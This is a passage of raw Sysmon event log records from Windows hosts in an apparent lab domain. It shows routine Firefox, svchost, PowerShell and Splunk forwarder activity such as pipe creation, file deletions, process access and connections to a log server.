Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001054875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:08:06.476{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.377.157462496C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001054874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:08:06.476{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.377.157462496C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000810423Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:06.262{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810422Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:06.262{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810421Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:06.262{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:07.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F68C1A4D917BAD0BB3C8452F01C69E6E,SHA256=A3C04B9F8500B489E1B3DF95A2BF96B362706061EB6FC967A429849CB50595B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810425Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:07.606{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E81EC67CBE9B1E5E6910F169C7780335,SHA256=3E223AE692AB473B28AFF92EDC1A7D58EFE6D29B72F344325705067FA1E7CE21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:08.892{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=249F605EB81F88C446B31166D623EFC2,SHA256=967E1A262B10517D964DE36569EF1E86B12CEECFB9B0DDA9D5B06ED090369273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810426Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:08.653{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30DDFCE4D40B10A12C3133C456BC43F8,SHA256=CAD19FFD26E169C325DBA3532BF3AB2368B357FE3443DDC8B8BE7C1E9A31FC7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:08.661{466BC892-F862-60EB-F97D-00000000CF01}9624ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:09.894{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ED63D211692A9775BFD34C21B1A16F6,SHA256=D2FDE36DD93EB7552613092CF660962892BB629CDAED4C777392A54AD782E586,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810427Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:09.731{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71DC00FEF52B8294B7B781126C3C0DCD,SHA256=3BCE6D1928B28BFB3B809A71899F732EB0202DCFF2E6D5FA0D05653A8EAF6E06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:09.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E9A13BA7C2D09342A3A5947642FE0929,SHA256=684BBEFCF2EC48E8EC2C74D8624B4FBEED33A95088EBAE44E34B550E8D46DF71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:10.909{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6007A54471F30125130B2BE4E67B503D,SHA256=C807D68A9DF0C013C333A14B35170976B0AFABCE67E3F1EA44C7AD28A90341DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810429Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:10.746{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE3852F91D613AC0249154A2FE4DCB32,SHA256=C7CA39E4BF5E25BE6E39D3F3324F0BAC3E9B060E10FC34DC9DE94D4B35632CE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:01.619{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61974-false10.0.1.12-8000- 354300x8000000000000000810428Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:08.255{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57467-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.947{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90276EBE398E14573CD1FBFE43C85693,SHA256=69F2D5D927C33EE5991D5AAFA88F9C2874FAEFDECE5C0352A02E1D7AC4A35356,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810430Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:11.746{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A33A8A8011D6374A31CBBDC276CBF947,SHA256=81EA43CD8E65B733D6AE24A97FF2BD72E1FCB9BD21B90875F114B5823427DFD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4CCD3035C5B2F99A049C18B19F00B622,SHA256=565B1A477964634B8AE933A9A0D0A4F32C229D53EAEF2F62C95D9DD328E173B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BB7AA62B42CD83B53488601076B29B59,SHA256=E66B04B0B6361A280A501FD70D8F8B6EBE60BFFCDE5EEB1D747989BB1F7E1B60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8E9C669C2931E3F0575F030095C294A7,SHA256=A50DB4363098859E7D185ED663D5A64812464B9B2D45D3A3388365DBF01A37E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D369E8BA3DEBCE898762EBB43E121722,SHA256=9D51B7E91BAB4C8305B5ED71E672BF451D712BEF984E929941CEED480BBD8709,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=75DA1C2CC10BF6A096B4D131C3598B40,SHA256=9F9C326B526C3DC852781AFA3DB89800479E7814A0836A7FA3365550D941A320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=62F9F57DB450E2AE01FF23F8B2563EFE,SHA256=BF2199233B38F2959EEFA18466B4B7DC241B19B1D33B7DEB6F1D32A61725252F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=17F426CAD8CA6DA34B756B0D3FD5A147,SHA256=03899F52ADFB713C8AA016EA15167240D751914703E0C17FE08B4A35D69E0FC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E688C5816DC261A6BA74CCE8ADC1C50C,SHA256=6AA36CFC9945192CECDA6EC351179E356DB22697196BB8667E2B719F1034DFC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.345{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4FA23FF18E6CB1312B18AE1CCA643E00,SHA256=7CFA3F522F8CBA58C335F3849D285107F0164CA9BA27BC2EC0D7C3C6F48E6665,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.344{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4A2ED5F22E8AF85121E67C4398DA6A5D,SHA256=EA1F4EE4E1552245B22B3695E014493510748B66914FBF895FDB12FB49E3A583,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.342{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5E841A962A9B1D093C363411EA414B36,SHA256=20E43D70DD55A332099739903C108BB306398CEC2C46FCA439EA07704C0E342C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:12.961{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7B225C111D66A7AF423FF3B222EA72E,SHA256=11C1BB706F1762BD5673AC4F3EF862FCC2AFE238BAEA6A6C7380392ED795E95B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810431Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:12.762{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=280D3C9AAB8C5534B837DE7CB1D200F6,SHA256=5AC07006472EBC33D1ED9D73E56D3FE71FF0036731DD23813404B30FAF0B597B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810432Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:13.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54BAB21887EAC651378991AC241B23FD,SHA256=4568D61E385F1658608CE03FDD17CD3B4155CF2AF2114AED779952B4407B7EE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810433Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:14.780{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEDFC46391B765F3429CDAB9A367E760,SHA256=9B58500F3E1D82A05267F368FD4ED1F1254C0818247A421815583EC7F5341479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:14.008{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1A1BD2F901B4CA94B94CCCBE517078A,SHA256=199A390388E5CE1E3B9E73C41AC347A8ED5BC34ACF674F5A3BA3179D0B6977B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810435Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:15.780{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72AFA1E5906329FA1D9C798668E3BAF2,SHA256=A34CC47D9167065DB3D270EE7FA836DD9AF8AC87646A9E83EC24452992E2E2AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:15.576{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=443455A1FE8714A8B6E8B566F65C919C,SHA256=8ADBEAD7C097D14CF9F87772FA020E2DC44E3097B49B532AE4D06EC85BA04951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:15.576{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=671AE2AF88BD1FAF16F595ACFB35F7A0,SHA256=636BFD0493C5E615A3E333FB85E9C9901EF4E35A9F699FB8A77E59342D24755C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:15.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B0177E2B22767903F50D67A874E451B,SHA256=161D2F32FC7355D719611485990DCF5ECCE4BA43BE782596D0A8BA8BEF89C3BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810434Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:14.208{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57468-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810436Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:16.796{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7954EDC1180096C5B23F4EA221AA1129,SHA256=366A789660A39FEF5AC6A91EE7849EC2C32CE609983BBFEF0E369CBDB136FA13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.376{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F8F01CB05FAC7EB21960C49D4ED96B14,SHA256=ED5DF98769207B192001301A0E1D753485D16AB5232AFA29815DE0333D2CB7DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.376{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4B54CF66D742CB324562327050DFB14D,SHA256=64616534477144A504BB02691FBA574DCFB2F58B1EC2222CFCFAA65CAB708B41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=09BFC1C9577B3757E301ABC1C0630D64,SHA256=1D4E61E0D803E20025F2831B9415F87F416C9341B4DF5DB2907BBF609E09A071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=02E0B2B9B25107FC4E46148B68D3D938,SHA256=13D52CA4460C3B0670105A16E750BC4E70BD5B645528593B3A925BF075AC48E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5E2A1A0D0FF186577D4EA400B12AE82A,SHA256=87F6254E8649626E2FE9BEC29A15AC5BBF07096803BB1E7B282F17B7B96EEBF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=78ECFA3C82246EEB4A8402EFD642CC95,SHA256=C4B03E6F4B2E5AC653C4FBC1212BEF7B4F23713B0CA6C5A9B53D7F0BAAB50D9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 